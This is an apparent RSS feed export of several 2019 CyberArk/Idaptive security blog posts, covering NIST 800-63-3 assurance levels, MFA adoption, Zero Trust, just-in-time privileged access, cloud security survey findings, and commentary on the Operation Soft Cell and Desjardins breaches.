Authenticator Assurance Level 1: AAL1 provides some assurance that the claimant controls an authenticator bound to the subscriber’s account. AAL1 requires either single-factor or multifactor authentication using a wide range of available authentication technologies. Successful authentication requires that the claimant prove possession and control of the authenticator through a secure authentication protocol.

Authenticator Assurance Level 2: AAL2 provides high confidence that the claimant controls authenticator(s) bound to the subscriber’s account. Proof of possession and control of two different authentication factors is required through secure authentication protocol(s). Approved cryptographic techniques are required at AAL2 and above.

Authenticator Assurance Level 3: AAL3 provides very high confidence that the claimant controls authenticator(s) bound to the subscriber’s account. Authentication at AAL3 is based on proof of possession of a key through a cryptographic protocol. AAL3 authentication requires a hardware-based authenticator and an authenticator that provides verifier impersonation resistance; the same device may fulfill both these requirements. In order to authenticate at AAL3, claimants are required to prove possession and control of two distinct authentication factors through secure authentication protocol(s). Approved cryptographic techniques are required.

A summary table of the requirements for the 3 AALs is listed below:

NIST 3 image1

Address the three AALs with Idaptive Adaptive Multi-factor Authentication

Idaptive has been consistently ranked as one of the top cloud-based multi-factor authentication solutions, both by customers and leading analysts like Kuppinger Cole and Gartner. Idaptive not only has the broadest choice of authentication factors but is also the most versatile in supporting MFA Everywhere – the ability to deploy multi-factor authentication to all possible use cases, whether it is for the VPNs (like Palo Alto Networks), windows PCs or Amazon Workspaces virtual desktops.

Mapping Authenticators to Idaptive Authentication Mechanisms

Below are some examples of how Idaptive’s supported authentication mechanisms map to the authenticators defined by NIST. Note that this is by no means exhaustive in terms of all the authenticators supported by Idaptive.

NIST3 chart2

SMS OTP as a Second Factor? No!

Although SMS OTP is one of Idaptive’s most commonly used second factor, NIST strongly discourages its use and considers it as a “Restricted Authenticator”. According to NIST authenticators that leverage public switched telephone network (read telecom carriers).

Biometrics as an Authenticator

The guidelines also talk about biometrics based authenticators, commonly referred to as “something you are”, and which can take the form of an electronic representation of an individual’s unique physical features (fingerprint, IRIS scan, heartbeat) or unique behavioral characteristics (e.g. typing cadence). The 800-63-B guidelines only allow for very limited use of biometrics as an authenticator. This is because the False Match Rate (FMR) or False Accept Rate (FAR) and False Non-Match Rate (FNMR) or False Reject Ratio (FRR) associated with biometrics does not provide the right level of confidence during authentication. Biometrics comparison is also probabilistic and not deterministic, which is an important aspect of all the other approved authenticators. Biometrics features are also not secrets, since they can often be obtained by taking a picture, high-res if needed, of someone (facial recognition, IRIS scan) or lifted from objects someone touches (fingerprints). There are ways of mitigating these using proprietary feature to biometric template conversion algorithms and such, but that ensures additional trust in those algorithms. Hence, according to NIST, biometrics should only be used as a part of MFA with a physical authenticator (something you have). Also, the FMR of the biometric system should be 1 in 1000 or better. There are more conditions under which biometrics can be used which are explained in more detail in the guidelines document itself. In line with NIST guidelines, Idaptive supports biometrics authentication such as facial or fingerprint recognition on mobile devices as a second factor or even a third factor for authentication into systems.

Risk-based or Adaptive Authentication Systems and NIST

Risk-based or Adaptive Authentication Systems often leverage contextual information such as device context, user context, location context and network context to compute a risk score, that can then be leveraged to determine if and how (with what factors) a user needs to reauthenticate to a system. Adaptive authentication systems are great at improving the end user experience related to MFA, while also ensuring that an authentication decision is augmented by a more in-depth analysis (often driven by machine learning) of the user’s behavior. While these solutions are not considered as a valid authenticator by NIST on their own (since they can’t be called a “secret”), these solutions are becoming table-stakes as we move towards a Zero Trust world. Idaptive is the only leading IDaaS vendor that has its own User Behavior Analytics solution completely  integrated with its MFA portfolio, giving us the ability to augment MFA with risk-based access.

I could go on and explore this guideline even further, given that this topic (authentication and authorization) is particularly close to my heart. But I’ll end this conversation here and if you’re interested in finding out more how Idaptive helps address these guidelines in greater detail, reach out to us, or sign-up for our free trial here.

NIST Series Part 1

NIST Series Part 2

NIST Series Part 3

NIST Series Part 4

]]>
Getting Over MFA Implementation Hesitation https://www.cyberark.com/blog/getting-over-mfa-implementation-hesitation/ Mon, 15 Jul 2019 17:33:47 +0000 https://www.cyberark.com/?p=99368

We talk a lot about how multi-factor authentication (MFA) is a vital tool in a Zero Trust approach, the most promising strategy to keep an organization safe from breaches.  We may even take it for granted that our audiences know exactly what we’re talking about with MFA and why it is so important. In the industry analysis section of the recent 2019 Verizon Data Breach Investigation Report, MFA was recommended as a “thing to consider” to four different industries, including finance and insurance. It is surprising that in 2019 this seemingly standard tool for security should even have to be recommended to industries. What is behind any hesitation to implement MFA, and how can enterprises overcome this reluctance?

Anyone who travels can relate to the desire to arrive at the airport, pass quickly through security, settle into your seat, and take off into the air in, say, 15 minutes. But the reality is all travelers must go through security checks, and this can take time. And while travelers do indeed complain about TSA regularly, no one wants to have an incident once on board. There is always a fine balance between user experience in accessing something and also delivering security.

We hear from analysts and customers that MFA and delivering a solid user experience are at odds with each other. Traditionally, as security moved towards the implementation of strong authentication, it could compromise user experience. Enterprises naturally don’t want to frustrate their users or encourage them to create work-arounds. A B2C company might wonder, “will MFA reduce traffic to the website?” These are legitimate concerns.

With an adaptive MFA solution, like CyberArk Idaptive’s security is strengthened with context and behavior-based access controls to all applications. Analytics and machine learning are leveraged to detect abnormal and risky user behavior while prompting an MFA challenge or blocking access in real-time. When a user signs in from her usual device, into her typical apps, in her typical geolocation, she won’t have to be prompted with MFA. Think of it as having ‘TSA Pre-Check’ on her airline ticket, speeding up her airport security process but at the same time continuously monitoring her actions (Behavioral Analytics) so that she can be asked to undergo security screening if any anomaly is detected. This delivers a good user experience without compromising security.

Another reason behind any hesitation for MFA could be the perceived cost of managing those second factors. A decade ago, smartphones were just starting to mature. For authentication, people still used smart cards, USB keys plugged into devices, and SMS as one-time passwords. There were immense costs associated with managing many of these and their life cycles. For example, vendors like AT&T would charge for every SMS sent out. Even a rechargeable smart card would cost $50. Deploying measures like this to an entire organization would quickly rack up the expenses.

All of this changed in the last decade. Today, smartphones are ubiquitous — everyone has them. Bring your own device (BYOD) is very common, which means most individuals carry and manage their own phones for the organization. As a result, the cost of operating many second factors for multi-factor authentication has gone down, while also offering new possibilities for authentication methods such as authenticators for new standards such as WebAuthn/FIDO2.

Our adaptive MFA includes a comprehensive range of authentication methods, including passwords, smart cards, soft tokens, or cryptographic devices. It’s not enough to protect your organization — the experience for employees should be frictionless. Whether it’s a push notification, Integrated Windows Authentication, Idaptive mobile authenticator, SMS/text message, email, interactive phone call, YubiKeys, USB devices, digital certificates, enabling FIDO U2F, smart cards, or derived credentials or biometrics, we’ve got an authentication method for everyone, even the most hesitant of organizations.

We won’t go so far as to evoke that old saying, “you snooze, you lose” but hesitating to put an adaptive MFA solution to work protecting your employees and extended business could have a similar impact to a hijacker getting through security because there was no TSA agent.

]]>
NIST 800-63-A: Enrollment and Identity Proofing https://www.cyberark.com/blog/nist-800-63-a-enrollment-and-identity-proofing/ Tue, 09 Jul 2019 15:10:15 +0000 https://www.cyberark.com/?p=99070

A digital identity, as we discussed in our earlier blog, is a unique representation of the real-world individual in an online world, as the individual participates in an online transaction. In many cases, a service or a Relying Party (RP) does not necessarily need to map that digital identity to the real-world identity of the individual, especially in cases where there is a genuine need to ensure the complete protection of the individual’s privacy and even anonymity. But in other cases, for reasons that could range from regulatory (e.g. Know Your Customer) and security (fake accounts in social media, DeepFake) to others, there may be a need to ensure that the digital identity is mapped to and validated against a unique real-world individual. This process of mapping and validation is called enrollment and identity proofing.

nist2 image 1

Figure: The Identity Proofing User Journey, Source: NIST Special Publication 800-63A

Identity Assurance Levels

The “strength of the assurance” with which this digital identity is mapped to and validated against a unique real-world individual is referred to in the NIST guidelines as Level of Assurance.  NIST defines three levels of assurance (LOA) for the identity proofing process — 1, 2 and 3 — in increasing order of their strengths.

Identity Assurance Level 1 (IAL1)

NIST provides the following description for IAL1: “There is no requirement to link the applicant to a specific real-life identity. Any attributes provided in conjunction with the subject’s activities are self-asserted or should be treated as self-asserted (including attributes a CSP asserts to an RP). Self-asserted attributes are neither validated nor verified.”

In other words, IAL1 does not require any verification of claims and attributes that the user provides to the credential service provider.

Identity Assurance Level 2 (IAL2)

For IAL2, NIST provides the following description: “Evidence supports the real-world existence of the claimed identity and verifies that the applicant is appropriately associated with this real-world identity. IAL2 introduces the need for either remote or physically-present identity proofing. Attributes could be asserted by CSPs to RPs in support of pseudonymous identity with verified attributes. A CSP that supports IAL2 can support IAL1 transactions if the user consents.

IAL2 allows for remote or in-person identity proofing. Example of this proofing includes services that may request an individual to prove proof of possession of an identity document, such as a Driver’s License or a Passport. As part of this, collection of personally identifiable information (PII) should be kept to a minimum – only to resolve the user’s identity in the context of the service that requires the identity. Also, the credential service provider may collect biometrics for the purposes of non-repudiation and re-proofing.

Identity Assurance Level 3 (IAL3)

IAL3 is described in the following way: “Physical presence is required for identity proofing. Identifying attributes must be verified by an authorized and trained CSP representative. As with IAL2, attributes could be asserted by CSPs to RPs in support of pseudonymous identity with verified attributes. A CSP that supports IAL3 can support IAL1 and IAL2 identity attributes if the user consents.”

In essence, IAL3 is stricter than IAL2 in terms of requiring further and stronger evidence of the user’s attributes so as to protect the identity and the relying party from impersonation, fraud or other such issues. Biometrics are considered mandatory as part of IAL3.

Summary of the IAL Requirements across LOA 1, 2 and 3

The actual requirements of the three IALs are far more comprehensively discussed in the document, but below is a summary table discussion them, also courtesy the guidelines document.

NIST2 chart

The guidelines document goes into much more detail about items such as what does “WEAK, “FAIR”, “STRONG”, “SUPERIOR”, etc. mean in the context of verification and validation of credentials.

Selecting an IAL

Selecting an IAL for your service (relying party) can be a difficult proposition, but NIST has been kind enough to include an IAL decision tree as part of the main 800-63-3 document, as shown in the image below.

NIST2 image 2

The document also goes into more details on the six decision points above.

The Road Ahead…

Enrollment and Identity Proofing is increasingly gaining in importance as we see digital transformation of organizations and business models across the board resulting in an explosion of digital services. With this explosion, we’re also starting to see more impersonation and fraud in the consumption of those digital services. New models like Forrester’s Zero Trust framework, or Gartner’s CARTA are also increasingly incorporating capabilities related to verification and validation of the user’s real-world identity along with proof of possess of authenticators into the process of authentication and authorization to digital services. Along those lines, Idaptive continues to partner with vendors in the enrollment and identity proofing space to augment our authentication and federated assurance capabilities, in our goal to secure and protect access to online services.

NIST Series Part 1

NIST Series Part 2

NIST Series Part 3

NIST Series Part 4

]]>
CyberArk Docs: Privileged Access Management Documentation for All https://www.cyberark.com/blog/cyberark-docs-privileged-access-security-documentation-for-all/ Tue, 09 Jul 2019 13:00:47 +0000 https://www.cyberark.com/?p=70099

Not long ago on the CyberArk Conjur blog, our DevOps community manager and evangelist John Walsh explored the history and evolution of open source software. It’s a great read that highlights the clear relationship between open source adoption and DevOps success in the enterprise, along with the power of community engagement and information sharing.

We’ve embraced this team player approach with CyberArk Conjur and our fast-growing CyberArk Marketplace, which features community contributions. Furthering this commitment to collaboration and transparency, today we published our product documentation library online, making it freely available to everyone – no login required.

Featuring newly simplified and enhanced documentation on CyberArk version 10.10, CyberArk Docs makes it even easier to get your questions answered – fast.

Considering a privileged access management solution? Whether your organization is just getting started or already focused on implementing advanced privileged access management strategies to align with digital transformation initiatives, CyberArk Docs is a good place to start. Get to know CyberArk by browsing documentation by product: Core Privileged Access Security, CyberArk Privilege Cloud, Endpoint Privilege Manager and Application Access Manager. On each of these product pages, it’s easy to find information on security fundamentals, how to get started with a deployment, how to configure or manage your environment and how to install or upgrade components. The site is easy to navigate, offering documents organized by functional role with information for end users, administrators and developers.

CyberArk Docs is also part of our broader CyberArk Technical Community site, available to current customers and partners, where you can connect and engage with peers and subject matter experts on CyberArk products and services. Through the Technical Community you can now browse and download helpful documentation from CyberArk Docs, take advantage of our comprehensive knowledge base, access a wide range of online training courses and post integrations and reviews on the CyberArk Marketplace. There’s also a simple way to submit support cases and enhancement requests.

CyberArk Docs is just one of the many ways we’re extending value to the broader cybersecurity community. Inspired by open source, our goal is to make it easier for end-users, admins, developers and security professionals alike to access the information and tools they need to collaborate, innovate, build and succeed.

Check CyberArk Docs out today and let us know what you think on Twitter @CyberArk or via email at Documentation@CyberArk.com.

 

]]>
NIST 800-63-3 Digital Identity Guidelines – A Primer https://www.cyberark.com/blog/nist-800-63-3-digital-identity-guidelines-a-primer/ Tue, 02 Jul 2019 15:01:14 +0000 https://www.cyberark.com/?p=99020

The National Institute of Standards and Technology (NIST), in June 2017, published a new set of guidelines as part of their special publication 800-63-3 that provided technical requirements for federal agencies implementing digital identity services. These guidelines have been instrumental in helping me and many others in the Identity and Access Management space learn, think through, and build out product strategy for our product lines. I’ve had the privilege and good fortune to speak to many of Idaptive’s customers about these guidelines in the context of their identity and authentication assurance needs, and I’ve always been encouraged and inspired by the immense amount of interest and debate these guidelines generate. Also, I recently had the great privilege to speak to some incredibly smart folks at NIST about Idaptive and our technology, and it made me realize that it was time to put pen to paper and provide a quick perspective on these guidelines. This is part one of a 4-part blog series.

The 800-63-3 Digital Identity guidelines have expanded on a singular concept of level of assurance (LOA) for all electronic authentication of digital identities that was originally introduced in 800-63-2. The new guidelines are more specific to the business needs and use cases where digital identities are to be used. Very broadly, the new guidelines cover three processes, Identity Proofing, Digital Authentication and Federated Identity Management.

The Digital Identity, as NIST explains it

The digital identity is a unique representation of the physical subject, or individual (in Idaptive’s world, given our focus), in the online world, that is engaged in an online transaction. This transaction could be as simple as just logging into a single service, or as complex as performing an e-commerce transaction across multiple services or websites. The purpose of the digital identity is often limited to use in the context of the service alone and does not necessarily need include or need all the physical world attributes or information of the individual.

Identity Proofing, Digital Authentication and Federated Identity Management

NIST image 1

Figure: Digital Identity Model, Source: NIST Special Publication 800-63 Volume 3 Revision 3, Digital Identity Guidelines

The image above provides an excellent overview of the key processes digital identities participate in. CSP, in this diagram, refers to a Credential Service Provider that is responsible for performing the enrollment, identity proofing and issuance processes. The Verifier is responsible the service or the party that verifies the individual’s digital identity.

Enrollment and Identity Proofing is the process of assuring that an individual (or subject) is who they claim to be, and “IAL” (Identity Assurance Level) refers to the level of assurance (or “strength”) with which this assurance can be described. An example of proofing an individual would be to ask them questions about them that only they (hopefully) would know. Alternately, another example would be to ask them to submit a copy of their state issues Driver’s License, proving proof of possession of a state attested identity document.

Digital Authentication is the process of an individual attempting to access a service, and “AAL” (Authentication Assurance Level), similarly, is used to provide assurance that the individual accessing a service is possession of one or more authenticators associated with them. An example of this would be to send a one-time password to the individual’s registered phone via a notification or a text. Another example would be to ask the user to authenticate using their Personal Identity Verification, or PIV card.

Finally, Federated Identity management involves a user, authenticated by a third party Identity Provider (IdP), attempting to access a service (Service Provider) or a Relying Party (RP) via a token or an assertion that the IdP sends to the service, and “FAL” (Federated Assurance Level) refers to the strength of that assertion that is used to communicate authentication and attribute information to the RP. 800-63-3 is further broken down into 800-63-A which provides guidelines on Enrollment and Identity Proofing and covers Identity Assurance Levels, 800-63-B which provides guidelines on Authentication and Lifecycle Management and covers Authentication Assurance Levels and finally, 800-63-C which provides guidelines on Federation and Assertions, and covers Federated Assurance Levels.

Levels of Assurance, at a glance

The NIST guidelines document provides an excellent summary of what constitutes Levels of Assurance for each of the three key processes mentioned above. Levels of Assurance for a process, for all practical purposes, are indicators of the “strength” of the identity and access management controls implemented as part of that process. Typically, they range from level 1 to level 3. Below is a series of tables that are included in the guideline document that provide the summaries.

Identity Assurance Levels

Identity Assurance Levels

Authentication Assurance Levels

Authentication Assurance Levels

Federated Assurance Levels

FAL levels

Each of these guidelines, by themselves, deserve a series of blogs, if not a whitepaper. To that end my next series of blogs on this topic will focus on providing additional color on 800-63-A, 800-63-B and 800-63-C, how organizations should go about adopting these guidelines and choosing what level of assurance they should ideally target, and how Idaptive can help with achieving high levels of assurance for 800-63-B and 800-63-C. Stay tuned!

NIST Series Part 1

NIST Series Part 2

NIST Series Part 3

NIST Series Part 4

]]>
Protect, Detect, Deter, Respond is Not a Security Strategy https://www.cyberark.com/blog/protect-detect-deter-respond-is-not-a-security-strategy/ Mon, 01 Jul 2019 19:37:29 +0000 https://www.cyberark.com/?p=98920

The last few weeks haven’t been kind to cybersecurity. From the healthcare organizations tasked with handling our most sensitive patient records to startups that are supposed to be the vanguard of tech and immune to this sort of thing — no organization is genuinely safe. And no matter the strength of the defensive postures that might be put in place, it seems that malicious actors are still able to circumvent them and break through.

That’s because most organizations today have the wrong approach when it comes to cybersecurity.

The majority of executives today believe that bolstering protection against security vulnerabilities should be their number one priority — when, in fact, 80 percent of breaches today are the result of default or stolen passwords according to the Verizon Data Breach Investigations Report.

It’s not their fault; fancy zero-day attacks and stolen NSA tools steal the headlines and make cybersecurity seem like complicated stuff. What is clear is what’s not working. A strong perimeter “barrier” is no longer effective. It’s just not possible to separate the “good guys” from the “bad guys” (and they are likely inside the gates already). Passwords alone can’t stand up to the breadth and sophistication of today’s relentless attacks.

Technology by itself won’t eliminate the risk or guarantee that information stays safe without first implementing the right strategy and practices.

A prominent industry analyst summed things up nicely at a sold-out cybersecurity summit I recently attended:

“People will say, ‘We’re doing things. We’re working on it,’” he said. “Well, guess what Target’s strategy was before the breach? Protect, detect, deter, respond. Guess what OMB’s strategy was before the breach? Protect, detect, deter, respond. That’s not a strategy. Those are things that you do. Those are pieces of it.”

He’s right. “Protect, detect, deter, respond” is not a security strategy. It’s a reaction to the forces at play in the cybersecurity world today.

That’s why Idaptive has been built around a proven approach that does actually reduce data breaches: Zero Trust.

Zero Trust is a foundational approach to cybersecurity that ensures every person and device granted access are who and what they say they are. It’s the single most important step a company can take to help themselves make sense of the increasing complexity tied to cybersecurity and identity & access today. The philosophy that defines Zero Trust is “never trust, always verify,” which ensures that every user is verified, every device is validated, and access is intelligently limited — every time. Studies have shown that companies adopting this approach experience 50 percent fewer breaches, while also reducing the overall cost of access technology by an average of 40 percent.

“If you stand up and say, ‘Our security strategy is to work towards a Zero Trust infrastructure.’ There it is,” this prominent industry analyst concluded. “One sentence. Everyone can get behind that.”

So, stay tuned in the coming weeks as I dig into the steps your organization can take to adopt a Zero Trust base, including how to make existing and new technology work and how to get your teams to buy-in to Zero Trust. If you’re serious about taking your cybersecurity to the next level and keeping sensitive information safe, you won’t want to miss them.

Read the Zero Trust series here:

Zero Trust Series – 1  What Is Zero Trust and Why Is it So Important?

Zero Trust Series – 2 Like the Night King, Perimeter Defense is Dead

Zero Trust Series – 3 Imposter Syndrome: Why You Can’t Separate the “Good Guys” from the “Bad Guys”

Zero Trust Series – 4 Passwords are Just one Piece of the Cybersecurity Puzzle

Zero Trust Series – 5 The Future of Cybersecurity is Artificial: Intelligence Will Transform Enterprise Governance

Zero Trust Series – 6 Protect, Detect, Deter, Respond is Not a Security Strategy.

Zero Trust Series – 7 Upping the Security Ante: How to Get Teams’ Buy-in for Zero Trust

Zero Trust Series – 8 Next-Gen Access and Zero Trust are the PB&J of Security

Zero Trust Series – 9 Passwords Need Fixing. Zero Trust is the Solution.

Zero Trust Series – 10 The One-Two Punch of Zero Trust. Verify Every User, Validate Every Device.

Zero Trust Series – 11 “Should I Stay or Should I Go?” Artificial Intelligence (And The Clash) has the Answer to Your Employee Access Dilemma.

Zero Trust Series – 12 Grow Up! Plotting Your Path Along the Zero Trust Maturity Model

]]>
Just-In-Time Access: Right Access, Right Resources, Right Reasons https://www.cyberark.com/blog/just-in-time-access-right-access-right-resources-right-reasons/ Thu, 27 Jun 2019 14:25:42 +0000 https://www.cyberark.com/?p=69645

Just-in-time is a management philosophy that can be traced back to the early 1970s in Toyota manufacturing plants. Taiichi Ohno introduced this methodology in order to have production meet customer demand precisely and minimize waste. The major components of just-in-time manufacturing are: continuous improvement; eliminating waste; kanbans, which stop processes abruptly if they are not working; jidoka, which grant machines autonomy to carry out tasks so that workers can be more productive and levelled production, which smooths the flow of products through the factory. In order to successfully implement this business practice, teams need to be laser-focused on process, eliminating unnecessary activities and constantly striving for the best possible solution to a given problem. However, just-in-time is still just one piece of the overall puzzle and cannot be viewed as the singular reason for the success of Toyota.

In recent years, cybersecurity has adopted its own form of just-in-time called just-in-time access. Like its manufacturing namesake, just-in-time (JIT) access is geared towards removing waste, which is, in this case, unneeded access. This method of securing critical data and resources is implemented with the idea of providing the right person with the right access to the right resource at (and for) the right time for the right reasons — or, in other words, elevating privileges only when and where they’re required. Providing an audit trail of activities is essential for JIT, or else there becomes a trade-off between security and ease-of-use. Both are critical.

Just-in-time access is geared towards eliminating standing access and then dynamically bumping up privileged rights only when requested. The methodology, ideally, reduces friction for end-users and improves the security posture of the organization – so long as a clear and robust audit trail is provided. JIT eliminates standing access, thus providing better protection from attackers attempting to move laterally through the system.

Enterprises and analysts alike see JIT as being the next big thing in cybersecurity because it ensures that technical access is only provisioned to users or accounts when absolutely necessary. Gartner has noted[1] privileged access management in recent years[2] and has written about just-in-time access in a recent report, Best Practices for Privileged Access Management Through the Four Pillars of PAM. Per Gartner,  JIT access is the recommended method for privileged access, which is based on the principle that access is granted only for a short period of time and then removed, leaving no standing privileged access[3]. Further:

  • “A privileged account and session management (PASM) solution that can broker access to a privileged account, then remove access to that account.”
  • “Some PASM solutions can create an ephemeral account ‘on the fly,’ to be used only for a particular one-time use. The account would then be unavailable as soon as the user logs off and could either be removed or retained for future reuse.”
  • “A privilege elevation and delegation management (PEDM) solution could allow a user to temporarily elevate privileges for an account that is not privileged by default. Typically, this would enable a user to execute commands in privileged mode.”

These three concepts of just-in-time access share an underlying theme: reducing unneeded privileged access. This can be done with or without agents; it all depends on each organization’s propensity to manage them. An ideal solution will reduce unnecessary access to critical systems while simultaneously making things easier for their employees. Organizations can institute policies that limit privileged access to when it is needed or if it’s outside of the specified time frame, much like the “kanban” concept introduced by Ohno.

The typical workflow for just-in-time access is that a user (human or machine) requests access to a server, virtual machine or network device. The request is either checked against a policy of pre-approvals or goes to an administrator who either grants or denies access. (A jidoka could be useful here to enable task automation and ensure that workflows are followed, and mundane tasks aren’t subject to human error). The user, if granted access, enters the system and can go about their business as they normally would. After they’re done, they log off, and their access is revoked until they need it again. This just-in-time access workflow can be obtained in any of the above three ways, and provides organizations with a new way of approaching privileged access management.

As Mr. Ohno envisioned in the 70s, teams need a laser-focus on the task at hand, in this case cybersecurity. They must eliminate unnecessary activities (or access), lean on automation and strive to find the best solution to fit the given problem. Just-in-time access is subject to continuous improvement, since there is no single magic bullet to solve the issue of privileged access. But, just-in-time access can be a powerful tool for privileged access management just as it was for Mr. Ohno’s factory assembly line.

Stay tuned for Part 2 of just-in-time access blog series, which will cover CyberArk’s numerous capabilities from a product standpoint and what methods are appropriate for what scenarios.

 

[1] Gartner Top 10 Security Projects for 2019, Brian Reed, et al, 11 February 2019

[2] Smarter With Gartner, Gartner Top 10 Security Projects for 2019, 18 June 2018

[3] Gartner Best Practices for Privileged Access Management Through the Four Pillars of PAM,  Michael Kelley and Felix Gaehtgens, 28 January 2019

]]>
Privileged Access Key to China’s Attack on Telecoms https://www.cyberark.com/blog/privileged-access-key-to-chinas-attack-on-telecoms/ Tue, 25 Jun 2019 15:26:04 +0000 https://www.cyberark.com/?p=69179

The recent attack by China on Cellular companies – called Operation Soft Cell – is part of an espionage campaign that leverages privileged access in privileged accounts. Compromising credentials remains the weapon of choice for attackers and a top attack pattern.

We first encountered this pattern when Edward Snowden revealed Operation Socialist, a CIA and British Global Communication Headquarters (GCHQ) campaign that allegedly attempted to take control of one of the most widely spread telecommunications networks in the country – Belgian telecommunications company Belgacom. Access to Belgacom would allow intelligence agencies to obtain the metadata required to track specific target individuals. Aside from this new attack coming from a very different quarter, China’s APT 10 rather than the GCHQ, the attacks are very similar.

Operation Socialist, like the recent Soft Cell operation, leveraged privileged access and privileged accounts to take control of telecommunication systems and persist while remaining in the shadows. Neither of these attacks needed to exploit vulnerabilities or reveal sophisticated and aggressive tools, which cost a lot to develop. In both cases, the groups compromised the organization’s privileged accounts – namely domain admin accounts. Domain admin accounts have administrator rights over an entire domain, making them extremely useful to an attacker.

Domain admin accounts and other well-known privileged accounts are usually tightly-controlled and monitored. However, there were still vulnerabilities to exploit. The attackers probably went after shadow admins, which are privileged accounts that aren’t members of the privileged Active Directory group, letting them fly under the radar and often go overlooked by organizations’ security teams.

These type of accounts have special privileges that allow an attacker to gain control of a complete network control without being a member of a privileged group. Consequently, the attack leaves little trace, while still providing the attacker with flexibility. In the Soft Cell operation, the attackers launched a VPN service to allow them shadow access to the network – possibly based on shadow admin accounts.

Using shadow admins to gain access isn’t the only short cut that the attackers from Operation Soft Cell and Operation Socialist used. In both of these cases, the attacks on the telecom companies targeted the supply chain.  Just like hardware manufacturing facilities, software companies that provide product updates or internet traffic backbone servers are vulnerable to supply chain attacks.

This has become common with many attackers redirecting their efforts from well-defended organizations to their less-secure supply chains. Attackers who want intimate and persistent access to a company’s data and IP can replace sending phishing emails to vast numbers of employees with bugging the company’s hardware. Attackers who want access to an individual’s metadata, location and calls for a longer period of time, can replace exposing a costly WhatsApp vulnerability with compromising a specific individual’s phone.

]]>
Where Security Accountability Stops and Starts in the Public Cloud https://www.cyberark.com/blog/where-accountability-stops-and-starts-in-the-cloud/ Tue, 25 Jun 2019 13:23:54 +0000 https://www.cyberark.com/?p=69163

For years, security was cited as a prime reason not to put sensitive data or valuable workloads into the public cloud. It’s safe to say that situation has changed. In fact, the CyberArk Global Advanced Threat Landscape Report 2019: Focus on Cloud found that the vast majority (94 percent) of the 1,000 global organizations surveyed used cloud services in some way, shape or form. We see that that use is often to support digital transformation initiatives.

The public cloud isn’t being used for low-value data or unimportant assets. For instance, nearly half of the respondents are using SaaS-based business critical applications and a similar percentage use the public cloud for regulated customer data.

So far, so unsurprising.

The eye-opening discovery was the contrast between what organizations see as the major benefit derived from their use of cloud versus their understanding of their cloud security accountability.

The prime benefit that the organizations surveyed hoped to see from their usage of cloud was the ability to offload security to the cloud vendor, either completely or in part. This was potentially alarming, to say the least.  Cloud vendors take responsibility for certain aspects of security when companies use their services, but they are very clear about where their clients must step in and assume accountability. Protecting customer data remains the responsibility of the client.

Then, we found that three quarters of survey respondents, perhaps blindly, entrust the security of their cloud workloads completely to the cloud vendor while half this number realize that this will not provide them with broad protection – but do it anyway. At this point, it’s obvious that the shared security responsibility model, which is clearly communicated by major cloud vendors, is either not well-understood or being ignored by many organizations.

Our report looked further into how privileged credentials are protected in the cloud and whether the high-value privileged credentials that give access to the most sensitive cloud-based data and assets were being properly secured.

It shows widespread lack of awareness about the existence of privileged accounts, secrets and credentials in IaaS and PaaS environments as well as the lack of a strategy to secure them. With less than half of all respondents reporting having a privileged access management plan for the cloud, our findings indicate that organizations could be placing themselves – and their customers’ data – at significant risk.

For more details, download our eBook.

 

]]>
Data Breach at Desjardins Bank Caused by Malicious Insider https://www.cyberark.com/blog/data-breach-at-desjardins-bank-caused-by-malicious-insider/ Fri, 21 Jun 2019 22:15:50 +0000 https://www.cyberark.com/?p=68947

The largest federal credit union in North America, Canadian bank Desjardins Group, was the victim of a data breach that leaked information on 2.9 million members.

While member passwords, security questions and PINs weren’t compromised, the leak did reveal sensitive data like names, addresses, birth dates, social insurance numbers  (the Canadian equivalent of the social security number), email addresses and information on transaction habits for individual members. Business members saw their business names, telephone numbers, the names of owners and their AccèsD Affairs account users exposed.

The data breach wasn’t the result of an outside cyber attacker, but a malicious insider – someone within the company’s IT department who decided to go rogue and steal protected personal information from his employer. It’s easy to think of data breaches as the fault of cyber attackers hunched over laptops somewhere far away, but sometimes the real threat doesn’t need to break in. He’s inside the building with access to sensitive systems and personal data already.

Working in the company’s IT department, the malicious insider behind the Desjardins Group breach already had some level of privileged access and it’s likely that this is what he abused to access member’s personally-identifiable information (PII). What’s not as clear is why this activity wasn’t detected earlier. An early report from CBC states that it took several months to learn of the scope of the data-gathering scheme, a troubling trend that doesn’t seem to be going away. A report published by the Ponemon Institute estimates that the average time to identify a breach was 197 days in 2018 – more than 6 months. This gives malicious insiders or external attackers more than enough time to wreak havoc on their target.

According to Guy Cormier, president and CEO of Desjardin Group, this wasn’t an ordinary case of a company who had no controls in place to secure privileged access. He said that no one person at the bank has authority to access the information of all of the members. Apparently, the malicious insider in question used his own access and the privileged access of others to assemble the data trove. No matter what tactics or techniques were used by this attacker, foundational measures such as a properly architected privileged access management solution and multi factor authentication likely would have thwarted the malicious insider from securing unauthorized access to the privileged credentials of his colleagues.

While the malicious insider has been fired, much of the damage has already been done. Desjardins first noticed a suspicious transaction all the way back in December 2018, but only recently learned the full scale of the breach. During that period of time, Desjardins collaborated with the police to investigate the suspicious transaction, discover the extent of the data breach, the identities of those affected and find the culprit. (He has since been arrested, but as of writing, has not been charged with the crime.)

In the meantime, Desjardins Group has promised to reimburse its members for any losses stemming from this data breach and to provide them with 12-month credit monitoring plans. While Desjardins Group hasn’t released the figures accounting for the damage, a breach with this level of notoriety will likely be costly – especially in terms of long term brand damage and consumer trust. According to a study by Comparitech Ltd., public companies that have suffered a data breach under perform the Nasdaq by 15.6% three years after they reveal the breach.

This breach shows that a defense in depth security strategy that includes privileged access management, multi-factor authentication, and the detection of anomalous behavior with tools such as database activity monitoring has never been more crucial. While insider threats can be more difficult to identify, especially in a case where the user had privileged access rights, having a solution in place to monitor for unusual and unauthorized activities that can take automated remediation steps as needed can help reduce the amount of time it takes to stop an attack and minimize data exposure.  No one wants to have to wait six months or more to find out the full extent of the damage.

To learn more about how to detect insider threats and stop them, read The Danger Within: Unmasking Insider Threats.

To learn more about privileged access management, visit the Gartner Magic Quadrant for Privileged Access Management and read Privileged Access Security for Dummies.

]]>
Missing the Forest for the Trees: Top 5 CISO Pitfalls in Cybersecurity https://www.cyberark.com/blog/missing-the-forest-for-the-trees-top-5-ciso-pitfalls-in-cybersecurity/ Thu, 20 Jun 2019 15:14:22 +0000 https://www.cyberark.com/?p=68789

There is a lack of focus in cyber security.  This rarely stems from lack of hard work, desire, technical ability or aspiration.  Many cybersecurity leaders and teams voice concern around lack of funding, minimal executive support and share all too common stories of burnout at all levels of the organization (including the CISO).  However, these are often symptoms rather than root causes.  Without understanding the root causes, cyber security leaders can miss the forest for the trees — with the company’s true security risk reduction suffering for it.

